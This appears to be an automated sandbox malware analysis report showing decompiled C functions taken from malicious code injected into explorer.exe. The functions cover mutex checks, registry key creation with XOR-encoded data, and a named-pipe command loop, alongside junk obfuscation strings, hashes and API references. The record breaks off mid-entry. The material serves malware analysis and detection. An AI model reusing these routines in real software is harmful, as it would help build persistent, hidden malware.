2FDdTXhMdBWmsUIucHcnYKTLCRNDMFEicMKkRqAcjpBK8QWoSfew8 1wfisaAps peReXdq7RteB4XTk,woA qeNgw1HKrydyCy3YdgrYKctmhbu,EIXFXuMCUjP.EWlPoHO6Zl1PHXE36EucM.vgupJW jdCt4y7Hz1iR6pFwFEzri 4GFcDLoGV4vrc EcBzTHAokW39ego0abJSok9KYk8d4IoRkn xUz5y Nmn.CatXrJ JxEoxk,5a6bVpbMLi, xrefs: 00F548AC

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorInfoLastMultiWide
String ID: 2FDdTXhMdBWmsUIucHcnYKTLCRNDMFEicMKkRqAcjpBK8QWoSfew8 1wfisaAps peReXdq7RteB4XTk,woA qeNgw1HKrydyCy3YdgrYKctmhbu,EIXFXuMCUjP.EWlPoHO6Zl1PHXE36EucM.vgupJW jdCt4y7Hz1iR6pFwFEzri 4GFcDLoGV4vrc EcBzTHAokW39ego0abJSok9KYk8d4IoRkn xUz5y Nmn.CatXrJ JxEoxk,5a6bVpbMLi
API String ID: 4008099680-2848511271
Opcode ID: c8d3528313895e8cef2ce8ed0adb858c48bb0e7d5db4415f5946d8e8582185ea
Instruction ID: e42bbeaf0151397ea9d94215e720ec3a05c74f132c14db46ae4350d298196769
Opcode Fuzzy Hash: c8d3528313895e8cef2ce8ed0adb858c48bb0e7d5db4415f5946d8e8582185ea
Instruction Fuzzy Hash: D901F532655168AEE7206B64AC4AFFA37CCEB0576BF140021FF06D0482DA94E4C8F2F5

Uniqueness

Uniqueness Score: -1.00%

Function 00F54AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F54AE5(CHAR* _a4, intOrPtr _a8, signed int* _a12) {
				char _v40;
				intOrPtr _t16;
				void* _t17;
				intOrPtr _t18;
				signed int _t21;
				signed int _t23;

				if(_a4 != 0) {
					_t21 = CreateMutexA(0, 1, _a4);
					if(_t21 != 0) {
						if(GetLastError() != 0xb7) {
							L8:
							 *_a12 = _t21;
							_t23 = 1;
						} else {
							_t16 =  *0xf89740; // 0x547f6c8
							_t17 =  *((intOrPtr*)(_t16 + 0x2c))(_t21, _a8);
							if(_t17 == 0 || _t17 == 0x80) {
								goto L8;
							} else {
								_t18 =  *0xf89740; // 0x547f6c8
								 *((intOrPtr*)(_t18 + 0x30))(_t21);
								_t23 = 0;
							}
						}
					} else {
						GetLastError();
						goto L1;
					}
				} else {
					L1:
					_t23 = _t21 | 0xffffffff;
				}
				E00F5ABE5( &_v40, "NLWVcBOEMl1.f,16LSg  TFzqUySVGZ1FZpIepZ0OBv2L9HK.d,v8cq3R07PgmkYnzSWpUc1dnwM612tKCzYWDgb1yYP3y8d,C4KJpdv5gP.rgYymCX36YnwRL44jICMVWm d A2 jcMSVV2,v,4FN DuSYRjwnev2Uhiljt FVD AK2 O,WMrFzaz7PSuvRHCgCxPsoBfJaF4Qp9iQDagz 4oC4f.nOAPo,vqBR5je8o7W,3U yOt6O7nOMUjl mTJgkWxG66M59TWqNVsM c,gfx06FydGoc3EV7a2gDbrYp 54w9s7TKxn,a0.2tSw.i0L3m8TSW4,6RD4srIsvN5ot3G zT QdYKgMuv4wwKH6ASKmlo fE0VTL6zVk13oLCypcG7YkKNp.VKshl Y5NiAdwW dlfWZFnt4fTw SPmJ3VFaZ5EP6Mw ,PxDnfatGZC pQGYjzAiR01n WnJkGFXNoEAPRqwgbA8ow,8 sixCKz,a. 4asGn.DsFB2MmBiCTYBiVxC4B8bJVx7Zlm8FS9v NE4JlMvQcCq tXua.r9gvl PMFPS8wPVpvY3CY5g,CIN9MpYoufSddEevPPtCuK 58Q62eW8gyBwjEisA Y HjI7kcFgciQbiV7KTUWvcu4KSWPpRpdPJf9Lolkdy2M a 3dkY.Bbjw2AucgP2RCWcSw31NoEK51n.9n 6IXHa8wsnKamN06a5R cu.D0qoEmYDyABlOgHGxaWp3pM3vbD75nVO vhb5iA2uS,o Dne6Is nSas4R6  R3n1O.b GRx,dnPH0BPlvH2,xvvuOjd gn7J8tNTGj,UUePjCQ1.Jg H6ywto  59cLwZDB KfTDhUGmlVPT9DJalfkt0nqXIm0 eqGx9E YSYqtPfkcA x.NbSFw1TbNDVRgrY aUZmtNI.IO2uipaL,XxHZKcP5 d Q6E6F EIGT4ZnEUXlToM1rQM9K9ri.l Km  LdSPuAAg4j8lfbMfT Nw2h yxAwIxUe6pAoPS4qmTa4Bz0m8dv9jaQLPjoHE4Upe7 ng3FIdeMEt UlHWGNskTtK3wBqY 9ruVhrzPq2QDKMK 7OHNjyo3Na3Ngv644KELE3h2k4lmB6hzOchzrCbJkBOqBbL6 Ne.gkDoO9sSE8D0opFCg95bven ,1LWL4WjF2MtIRZylNip GYXxMKO9tkO6k,v3QNFHxQtCv3517AR AQD2SDIhHgLH8 PD0nCblJTeaZbuFbcEc1XLwDlAhYOXfaVdGyyZPZtIlf3ROA5Y0S2QAsJofF0 xpyob tsG g.dZ0,Qa0 hue1PV6wslxujb4d 5X3Xn,XnqBE6qDSbRDoyJN3jFo7cO SB6m7ee2y I,Jak,8 51qxqjjoUPeQEKRUviywU.kJaeXMHGbN4IdBys 0xXLd nDa8pmXBGGWmAecZTq2lobC7pgHMHK.BIP.LVPz2ftBIAnz2y3APtIFD dE9zVvZLRyvz2csYE3OiJvEUyKmnAwbouHdeiZAZ0xrSOj6zpFKaOskZ7G0V91a uLeoF18F26V  ,PxxZ77VZPFOLsO8NDbkEn9mcSJe0xXj9HZ 681eg6r 7dEEQ48JfTv0nNhQRT4uYVFYNUSMVhChj dEXZr9UGLkZGAhr,.6G13XDfSXLYhF ITcTXL7KjYX88Mhp7MCV20YcdRE.s9Y8oGuTjmdOl1EbRQ3DBIkpcWIfyI6t3vLG mVZ lhKMNn91FIgDeI2qc2 JipEjilv6,LAl1Kev K1w35qZ5EYlCOn4Wz5TKYcpi b HU82 ypgFYDtmA9f1giZ1zIkSPCcZeLmPAS.tC", 0x24);
				return _t23;
			}

0x00f54af0
0x00f54b09
0x00f54b0d
0x00f54b22
0x00f54b48
0x00f54b4b
0x00f54b4f
0x00f54b24
0x00f54b27
0x00f54b2d
0x00f54b32
0x00000000
0x00f54b3b
0x00f54b3b
0x00f54b41
0x00f54b44
0x00f54b44
0x00f54b32
0x00f54b0f
0x00f54b0f
0x00000000
0x00f54b0f
0x00f54af2
0x00f54af2
0x00f54af2
0x00f54af2
0x00f54b5b
0x00f54b67

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000), ref: 00F54B03
GetLastError.KERNEL32 ref: 00F54B0F
GetLastError.KERNEL32 ref: 00F54B17

Strings

NLWVcBOEMl1.f,16LSg TFzqUySVGZ1FZpIepZ0OBv2L9HK.d,v8cq3R07PgmkYnzSWpUc1dnwM612tKCzYWDgb1yYP3y8d,C4KJpdv5gP.rgYymCX36YnwRL44jICMVWm d A2 jcMSVV2,v,4FN DuSYRjwnev2Uhiljt FVD AK2 O,WMrFzaz7PSuvRHCgCxPsoBfJaF4Qp9iQDagz 4oC4f.nOAPo,vqBR5je8o7W,3U yOt6O7nOMUjl mTJg, xrefs: 00F54B55

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID: NLWVcBOEMl1.f,16LSg TFzqUySVGZ1FZpIepZ0OBv2L9HK.d,v8cq3R07PgmkYnzSWpUc1dnwM612tKCzYWDgb1yYP3y8d,C4KJpdv5gP.rgYymCX36YnwRL44jICMVWm d A2 jcMSVV2,v,4FN DuSYRjwnev2Uhiljt FVD AK2 O,WMrFzaz7PSuvRHCgCxPsoBfJaF4Qp9iQDagz 4oC4f.nOAPo,vqBR5je8o7W,3U yOt6O7nOMUjl mTJg
API String ID: 200418032-2729050501
Opcode ID: 299c4892a163cffefaf6761a9571ea6c827040d4c6b253fc12170ed752c2499d
Instruction ID: dc92fa81c2d41b12a5a5f87b9b5e6caaf688c21a15d1163a4329d2c14dbd2fe6
Opcode Fuzzy Hash: 299c4892a163cffefaf6761a9571ea6c827040d4c6b253fc12170ed752c2499d
Instruction Fuzzy Hash: 9B01B136904228ABCB215F64CC49BAD77A5FB44766F050120FF16A71D1D770EC88E7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C6A6, Relevance: 6.2, APIs: 4, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F5C6A6(void* __fp0, intOrPtr _a4, long _a8, long _a12, long _a16, long _a20) {
				int _v8;
				int _v12;
				char _v16;
				int _v20;
				void* _v24;
				long* _v28;
				void* _v32;
				char _v36;
				long _v40;
				void _v104;
				void* __ebx;
				intOrPtr _t96;
				int _t98;
				long _t103;
				long _t104;
				long _t107;
				signed char _t114;
				long _t117;
				long _t118;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t132;
				long _t133;
				intOrPtr _t135;
				long _t137;
				intOrPtr _t138;
				long _t139;
				intOrPtr _t140;
				char* _t143;
				intOrPtr _t144;
				int _t148;
				int _t152;
				intOrPtr _t153;
				long _t154;
				long _t159;
				long _t160;
				void* _t162;
				signed int _t167;
				int _t174;
				long* _t176;
				char* _t177;
				char* _t178;
				void* _t179;
				void* _t180;
				void* _t182;

				_t160 = _a12;
				_v32 = 0;
				_v24 = 0x80000001;
				_v8 = 0;
				_t176 = E00F5AC58(0x110);
				_v28 = _t176;
				if(_t176 != 0) {
					_t176[0x42] = _t160;
					E00F614DF( &_v104, __eflags, __fp0, _t160);
					__eflags = _v104 - 0x61 - 0x19;
					if(_v104 - 0x61 <= 0x19) {
						_v104 = _v104 + 0xe0;
					}
					_v16 = E00F62CB7();
					__eflags = _a8;
					if(_a8 == 0) {
						L16:
						_t96 =  *0xf89720; // 0xf90000
						__eflags =  *((intOrPtr*)(_t96 + 0x214)) - 3;
						if( *((intOrPtr*)(_t96 + 0x214)) != 3) {
							_push(0);
							_push( &_v104);
							_push("\\");
							_t98 = E00F5B367(_v16);
							_t180 = _t180 + 0x10;
							L20:
							_v8 = _t98;
							goto L21;
						}
						_v20 = 0;
						_t127 =  *0xf8974c; // 0x547f890
						_v24 = 0x80000003;
						 *((intOrPtr*)(_t127 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x110)))),  &_v20);
						__eflags = _v20;
						if(_v20 == 0) {
							goto L21;
						}
						_push(0);
						_push( &_v104);
						_t177 = "\\";
						_push(_t177);
						_push(_v16);
						_push(_t177);
						_t98 = E00F5B367(_v20);
						_t176 = _v28;
						_t180 = _t180 + 0x18;
						goto L20;
					} else {
						_t130 =  *0xf89720; // 0xf90000
						_t132 =  *0xf8974c; // 0x547f890
						_t133 =  *((intOrPtr*)(_t132 + 0x64))(_a8,  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x110)))));
						__eflags = _t133;
						if(_t133 != 0) {
							goto L16;
						}
						_t135 =  *0xf8974c; // 0x547f890
						_v12 = 0;
						_v24 = 0x80000003;
						 *((intOrPtr*)(_t135 + 0x20))(_a8,  &_v12);
						__eflags = _v12;
						if(_v12 == 0) {
							L21:
							E00F5B9F4( &_v16);
							_t162 = _v24;
							_t103 = RegOpenKeyExA(_t162, _v8, 0, 0x20019,  &_v32);
							__eflags = _t103;
							if(_t103 == 0) {
								_t104 = _a16;
								__eflags = _t104;
								if(_t104 != 0) {
									 *_t104 = 1;
								}
								_push(_v32);
								L30:
								RegCloseKey();
								_t174 = _v8;
								_t176[0x43] = _t162;
								_t107 = E00F5ACD6(_t174);
								_t167 = 0;
								 *_t176 = _t107;
								__eflags = _t107;
								if(_t107 <= 0) {
									L32:
									E00F5AB81( &_v8, 0xffffffff);
									return _t176;
								} else {
									goto L31;
								}
								do {
									L31:
									_t114 =  *(_t179 + (_t167 & 0x00000003) + 0x10) ^  *(_t167 + _t174);
									_t167 = _t167 + 1;
									 *(_t176 + _t167 + 3) = _t114;
									__eflags = _t167 -  *_t176;
								} while (_t167 <  *_t176);
								goto L32;
							}
							_v24 = 0;
							_t117 = RegCreateKeyA(_t162, _v8,  &_v24);
							__eflags = _t117;
							if(_t117 == 0) {
								_t118 = _a16;
								__eflags = _t118;
								if(_t118 != 0) {
									 *_t118 = 0;
								}
								_push(_v24);
								goto L30;
							}
							L23:
							E00F5AB81( &_v28, 0x110);
							memset( &_v104, 0, 0x40);
							E00F5AB81( &_v8, 0xffffffff);
							goto L1;
						}
						_push(0);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t137 = E00F5B367(_v12);
						_t180 = _t180 + 0x10;
						_v40 = _t137;
						__eflags = _t137;
						if(_t137 == 0) {
							goto L23;
						}
						_t138 =  *0xf8974c; // 0x547f890
						_t139 =  *((intOrPtr*)(_t138 + 0x14))(0x80000003, _t137, 0, 0x20019,  &_v36);
						__eflags = _t139;
						if(_t139 == 0) {
							_t140 =  *0xf8974c; // 0x547f890
							 *((intOrPtr*)(_t140 + 0x1c))(_v36);
						} else {
							_t148 = E00F62CCE( &_v36, 0x8fc);
							_v8 = _t148;
							_v20 = E00F5B60A(_a4);
							E00F5BA86( &_v8);
							_t152 = E00F5B550(_v12);
							_t182 = _t180 + 0x1c;
							_v8 = _t152;
							_t153 =  *0xf8974c; // 0x547f890
							_t154 =  *((intOrPtr*)(_t153 + 0x2c))(0x80000003, _t152, _v20, "\\", _t148, 0);
							__eflags = _t154;
							if(_t154 == 0) {
								_t159 = _a20;
								__eflags = _t159;
								if(_t159 != 0) {
									 *_t159 = 1;
								}
							}
							E00F5AB81( &_v20, 0xfffffffe);
							E00F5AB81( &_v8, 0xfffffffe);
							_t180 = _t182 + 0x10;
						}
						_t143 = E00F5B367(_v12);
						_t180 = _t180 + 0x18;
						_v8 = _t143;
						_t144 =  *0xf89740; // 0x547f6c8
						 *((intOrPtr*)(_t144 + 0x34))(_v12, _t178, _v16, _t178,  &_v104, 0);
						E00F5AB81( &_v40, 0xffffffff);
						_t176 = _v28;
						goto L21;
					}
				}
				L1:
				return 0;
			}

0x00f5c6ad
0x00f5c6b9
0x00f5c6bc
0x00f5c6c3
0x00f5c6cb
0x00f5c6ce
0x00f5c6d3
0x00f5c6dc
0x00f5c6e6
0x00f5c6f1
0x00f5c6f3
0x00f5c6f5
0x00f5c6f5
0x00f5c70b
0x00f5c70e
0x00f5c711
0x00f5c841
0x00f5c841
0x00f5c846
0x00f5c84d
0x00f5c891
0x00f5c895
0x00f5c896
0x00f5c89e
0x00f5c8a3
0x00f5c8a6
0x00f5c8a6
0x00000000
0x00f5c8a6
0x00f5c84f
0x00f5c85e
0x00f5c863
0x00f5c86a
0x00f5c86d
0x00f5c870
0x00000000
0x00000000
0x00f5c872
0x00f5c876
0x00f5c877
0x00f5c87c
0x00f5c87d
0x00f5c880
0x00f5c884
0x00f5c889
0x00f5c88c
0x00000000
0x00f5c717
0x00f5c717
0x00f5c724
0x00f5c72c
0x00f5c72f
0x00f5c731
0x00000000
0x00000000
0x00f5c73e
0x00f5c748
0x00f5c74b
0x00f5c74e
0x00f5c751
0x00f5c754
0x00f5c8a9
0x00f5c8ac
0x00f5c8b1
0x00f5c8c7
0x00f5c8ca
0x00f5c8cc
0x00f5c920
0x00f5c923
0x00f5c925
0x00f5c927
0x00f5c927
0x00f5c92d
0x00f5c930
0x00f5c935
0x00f5c938
0x00f5c93c
0x00f5c942
0x00f5c948
0x00f5c94a
0x00f5c94c
0x00f5c94e
0x00f5c965
0x00f5c96b
0x00000000
0x00000000
0x00000000
0x00000000
0x00f5c950
0x00f5c950
0x00f5c959
0x00f5c95c
0x00f5c95d
0x00f5c961
0x00f5c961
0x00000000
0x00f5c950
0x00f5c8db
0x00f5c8de
0x00f5c8e1
0x00f5c8e3
0x00f5c912
0x00f5c915
0x00f5c917
0x00f5c919
0x00f5c919
0x00f5c91b
0x00000000
0x00f5c91b
0x00f5c8e5
0x00f5c8ee
0x00f5c8fa
0x00f5c905
0x00000000
0x00f5c90a
0x00f5c75a
0x00f5c75b
0x00f5c75e
0x00f5c763
0x00f5c767
0x00f5c76c
0x00f5c76f
0x00f5c772
0x00f5c774
0x00000000
0x00000000
0x00f5c785
0x00f5c78b
0x00f5c78e
0x00f5c790
0x00f5c804
0x00f5c809
0x00f5c792
0x00f5c797
0x00f5c7a6
0x00f5c7ae
0x00f5c7b5
0x00f5c7bd
0x00f5c7c2
0x00f5c7c8
0x00f5c7cc
0x00f5c7d2
0x00f5c7d5
0x00f5c7d7
0x00f5c7d9
0x00f5c7dc
0x00f5c7de
0x00f5c7e0
0x00f5c7e0
0x00f5c7de
0x00f5c7ec
0x00f5c7f7
0x00f5c7fc
0x00f5c7fc
0x00f5c819
0x00f5c81e
0x00f5c824
0x00f5c827
0x00f5c82c
0x00f5c835
0x00f5c83a
0x00000000
0x00f5c83e
0x00f5c711
0x00f5c6d5
0x00000000

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e6cc57bcf04e27444e95b2cd709d0813aab2fbf7898903fe2fd7742011cde4af
Instruction ID: 804d4635bad3297b277645725263ddeb63650e7fcf6d6b3d558a1e2bcfa2bc22
Opcode Fuzzy Hash: e6cc57bcf04e27444e95b2cd709d0813aab2fbf7898903fe2fd7742011cde4af
Instruction Fuzzy Hash: 24918C71D04209AFCF10DFA8DD45DEEBBB8EF08321F240195FA16A7252D7349A04EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F55473, Relevance: 6.1, APIs: 4, Instructions: 141
pipeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00F55473() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				char _v20;
				signed int _v24;
				intOrPtr* _v28;
				char _v156;
				char _v160;
				void* __esi;
				intOrPtr _t30;
				signed short* _t35;
				intOrPtr _t44;
				intOrPtr* _t47;
				long _t58;
				struct _OVERLAPPED* _t62;
				char _t63;
				intOrPtr* _t65;
				void* _t67;
				signed short* _t80;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;

				_t62 = 0;
				_v16 = 0;
				do {
					_v12 = _t62;
					if(ConnectNamedPipe( *0xf89770, _t62) != 0) {
						L3:
						_push(_t62);
						_push( &_v12);
						_t30 =  *0xf89740; // 0x547f6c8
						_push(0x80000);
						_push( *0xf8976c);
						_push( *0xf89770);
						if( *((intOrPtr*)(_t30 + 0x88))() == 0 || _v12 == _t62) {
							GetLastError();
						} else {
							_t35 =  *0xf8976c; // 0x52fb020
							_t67 = ( *_t35 & 0x0000ffff) - 1;
							if(_t67 == 0) {
								_t84 = 1;
								_t9 =  &(_t35[4]); // 0x52fb028
								_t86 = E00F5B3BC(_t9, 0x20, 1,  &_v8);
								_t88 = _t88 + 0xc;
								_v20 = _t86;
								if(_t86 == _t62) {
									L17:
									_t80 =  *0xf8976c; // 0x52fb020
									E00F5CF8A( &_v156, 0x80,  &(_t80[4]));
									E00F613E0(0x84, 2,  &_v160);
									_t62 = 0;
									goto L19;
								}
								_t63 = _v8;
								if(_t63 <= 1) {
									_t44 = E00F516F5(E00F5CE8A( *_t86), 0, 0, 0);
									_t88 = _t88 + 0x10;
									_v160 = _t44;
									goto L17;
								}
								_t64 = _t63 - 1;
								_v24 = _t63 - 1;
								_t47 = E00F5AC58(_t63 - 1 << 2);
								_v28 = _t47;
								if(_t47 == 0) {
									goto L17;
								}
								if(_v8 <= 1) {
									L15:
									_v160 = E00F516F5(E00F5CE8A( *_t86), _v28, _t64, 0);
									E00F5B78C( &_v8,  &_v20);
									_t88 = _t88 + 0x14;
									goto L17;
								}
								_t65 = _t47;
								do {
									 *_t65 = E00F5B670(E00F5ACD6( *((intOrPtr*)(_t86 + _t84 * 4))),  *((intOrPtr*)(_t86 + _t84 * 4)));
									_t84 = _t84 + 1;
									_t65 = _t65 + 4;
								} while (_t84 < _v8);
								_t64 = _v24;
								goto L15;
							}
							if(_t67 == 3) {
								E00F613E0(0, 5, _t62);
								 *0xf89820 = 1;
								_v16 = 1;
							}
						}
						goto L19;
					}
					_t58 = GetLastError();
					asm("sbb eax, eax");
					if( ~(_t58 - 0x217) + 1 == 0) {
						break;
					}
					goto L3;
					L19:
					DisconnectNamedPipe( *0xf89770);
				} while (_v16 == _t62);
				return 0;
			}

0x00f5547e
0x00f55481
0x00f55484
0x00f55490
0x00f5549b
0x00f554b3
0x00f554b3
0x00f554b7
0x00f554b8
0x00f554bd
0x00f554c2
0x00f554c8
0x00f554d6
0x00f555f2
0x00f554e5
0x00f554e5
0x00f554ed
0x00f554ee
0x00f5551b
0x00f5551f
0x00f55527
0x00f55529
0x00f5552c
0x00f55531
0x00f555c0
0x00f555c0
0x00f555d4
0x00f555e7
0x00f555ee
0x00000000
0x00f555ee
0x00f55537
0x00f5553c
0x00f555b2
0x00f555b7
0x00f555ba
0x00000000
0x00f555ba
0x00f5553e
0x00f55545
0x00f55548
0x00f5554e
0x00f55553
0x00000000
0x00000000
0x00f55558
0x00f5557b
0x00f5558e
0x00f5559b
0x00f555a0
0x00000000
0x00f555a0
0x00f5555a
0x00f5555c
0x00f5556b
0x00f5556d
0x00f5556f
0x00f55573
0x00f55578
0x00000000
0x00f55578
0x00f554f3
0x00f554fe
0x00f55508
0x00f5550d
0x00f5550d
0x00f554f3
0x00000000
0x00f554d6
0x00f5549d
0x00f554aa
0x00f554ad
0x00000000
0x00000000
0x00000000
0x00f555f8
0x00f555fe
0x00f55604
0x00f55613

APIs

ConnectNamedPipe.KERNELBASE(00000000), ref: 00F55493
GetLastError.KERNEL32 ref: 00F5549D
GetLastError.KERNEL32 ref: 00F555F2

Part of subcall function 00F5AC58: RtlAllocateHeap.NTDLL(00000008,?,?,00F5B755,00000100,00000000,00F54903), ref: 00F5AC66

DisconnectNamedPipe.KERNEL32 ref: 00F555FE

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLastNamedPipe$AllocateConnectDisconnectHeap
String ID:
API String ID: 2458626162-0
Opcode ID: 75354424a439cf8ae149b20653a268efbc5f9acb9106e7f074149a42df0d069f
Instruction ID: e084c002702412a8ff40ab29d06ea0e5374040cdb133005e24296e07164071a5
Opcode Fuzzy Hash: 75354424a439cf8ae149b20653a268efbc5f9acb9106e7f074149a42df0d069f
Instruction Fuzzy Hash: C241C6B2D10209AFDB10EFB4DC85ABE77B9FB44716F184069EA06D2151EB349D48EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00F5947E, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F5947E(void* __ecx) {
				signed int _v8;
				void* _t3;
				signed int _t4;
				signed int _t5;
				signed int _t11;
				signed int _t13;
				intOrPtr _t14;
				intOrPtr* _t31;
				void* _t33;

				_t3 = CreateMutexA(0, 0, 0); // executed
				 *0xf897a0 = _t3;
				_t4 = ArcTo(0, 0x11, 0x44, 0x5b, 0x24, 0x46, 0x46, 0x5f, 0x28);
				_t33 =  *0xf897a0; // 0x394
				if(_t33 != 0) {
					_t4 = CreateMutexA(0, 0, 0);
					 *0xf8979c = _t4;
					__eflags = _t4;
					if(_t4 == 0) {
						goto L1;
					} else {
						_t4 = E00F58ADA();
						_v8 = _t4;
						__eflags = _t4;
						if(_t4 == 0) {
							goto L1;
						} else {
							 *0xf897cc = E00F5B670(0, _t4);
							E00F5B9F4( &_v8);
							 *_t31 = 0x100;
							_t11 = E00F5AC58();
							 *0xf897b8 = _t11;
							__eflags = _t11;
							if(_t11 != 0) {
								 *0xf897c4 = 0;
								 *0xf897b0 = 0;
								 *0xf897b4 = 0;
								_t13 = E00F5AC58(0x401);
								 *0xf897a4 = _t13;
								__eflags = _t13;
								if(_t13 != 0) {
									__eflags =  *0xf89848; // 0x0
									if(__eflags == 0) {
										E00F6F12A(0xf64d95, 0xf64e0d);
									}
									_t14 = E00F5F138(0xf86908, 8, 0x77a); // executed
									 *0xf89750 = _t14;
									ArcTo(0, 0x12, 0x3b, 0x21, 0x3b, 0x25, 0x3a, 0x51, 0x2f);
									_t5 = 0;
									__eflags = 0;
								} else {
									_push(0xfffffffc);
									goto L6;
								}
							} else {
								_push(0xfffffffe);
								L6:
								_pop(_t5);
							}
						}
					}
				} else {
					L1:
					_t5 = _t4 | 0xffffffff;
				}
				return _t5;
			}

0x00f59490
0x00f594a9
0x00f594ae
0x00f594b0
0x00f594b6
0x00f594c3
0x00f594c5
0x00f594ca
0x00f594cc
0x00000000
0x00f594ce
0x00f594d3
0x00f594d8
0x00f594db
0x00f594dd
0x00000000
0x00f594df
0x00f594e7
0x00f594ef
0x00f594f4
0x00f594fb
0x00f59501
0x00f59506
0x00f59508
0x00f59516
0x00f5951c
0x00f59522
0x00f59528
0x00f5952e
0x00f59533
0x00f59535
0x00f5953b
0x00f59541
0x00f5954d
0x00f59553
0x00f59560
0x00f59579
0x00f5957e
0x00f59580
0x00f59580
0x00f59537
0x00f59537
0x00000000
0x00f59537
0x00f5950a
0x00f5950a
0x00f5950c
0x00f5950c
0x00f5950c
0x00f59508
0x00f594dd
0x00f594b8
0x00f594b8
0x00f594b8
0x00f594b8
0x00f59586

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,00F55003), ref: 00F59490
ArcTo.GDI32(00000000,00000011,00000044,0000005B,00000024,00000046,00000046,0000005F,00000028,?,?,?,00F55003), ref: 00F594AE
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00F55003), ref: 00F594C3

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 24c1b1d4cc9131aad9478baa2a8ec2e497e1c1445b62061585bea5f2ef08df64
Instruction ID: 5d3454ebca5c85e263115c2af0edf18f31df1e24f6aa19913ee8af723c8a9ae3
Opcode Fuzzy Hash: 24c1b1d4cc9131aad9478baa2a8ec2e497e1c1445b62061585bea5f2ef08df64
Instruction Fuzzy Hash: 25213670A8C318BAE731AF245C06FBF3A88EB05B62F140516F705EA0D0D6F44544B791

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A73C, Relevance: 6.1, APIs: 4, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F5A73C(short* _a4, short* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char* _v20;
				long _t22;
				long _t25;
				char* _t26;
				intOrPtr _t27;
				long _t31;
				char* _t39;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t22 = RegOpenKeyExW(0x80000002, _a4, 0, 0x20019,  &_v8); // executed
				if(_t22 == 0) {
					_t25 = RegQueryValueExW(_v8, _a8, 0,  &_v16, 0,  &_v12); // executed
					if(_t25 != 0) {
						L6:
						if(_v8 != 0) {
							_t27 =  *0xf8974c; // 0x547f890
							 *((intOrPtr*)(_t27 + 0x1c))(_v8);
						}
						_t26 = 0;
						L10:
						return _t26;
					}
					_t39 = E00F5AC58(_v12);
					_v20 = _t39;
					if(_t39 == 0) {
						goto L6;
					}
					_t31 = RegQueryValueExW(_v8, _a8, 0, 0, _t39,  &_v12); // executed
					if(_t31 == 0) {
						RegCloseKey(_v8);
						_t26 = _t39;
						goto L10;
					}
					E00F5AB81( &_v20, 0xfffffffe);
					goto L6;
				}
				return 0;
			}

0x00f5a752
0x00f5a75a
0x00f5a75d
0x00f5a760
0x00f5a768
0x00f5a786
0x00f5a78a
0x00f5a7be
0x00f5a7c1
0x00f5a7c6
0x00f5a7cb
0x00f5a7cb
0x00f5a7ce
0x00f5a7df
0x00000000
0x00f5a7e0
0x00f5a794
0x00f5a797
0x00f5a79c
0x00000000
0x00000000
0x00f5a7ab
0x00f5a7af
0x00f5a7da
0x00f5a7dd
0x00000000
0x00f5a7dd
0x00f5a7b7
0x00000000
0x00f5a7bd
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000104,00000001,?,00F556AB,00000000,00000104), ref: 00F5A760
RegQueryValueExW.KERNELBASE(00000104,00F556AB,00000000,00F556AB,00000000,00000000,00000000,00000000,?,00F556AB,00000000,00000104), ref: 00F5A786
RegQueryValueExW.KERNELBASE(00000104,00F556AB,00000000,00000000,00000000,00000000,?,00F556AB,00000000,00000104), ref: 00F5A7AB

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$Open
String ID:
API String ID: 1606891134-0
Opcode ID: 8e99e41177282bb29194e0d8c55b674a6e1fb8f4730995250ba9b9a2613a21ad
Instruction ID: 73190e8f4edb8e89245b86467f5bef83e314f830b89e1c8b39550e5deea716b7
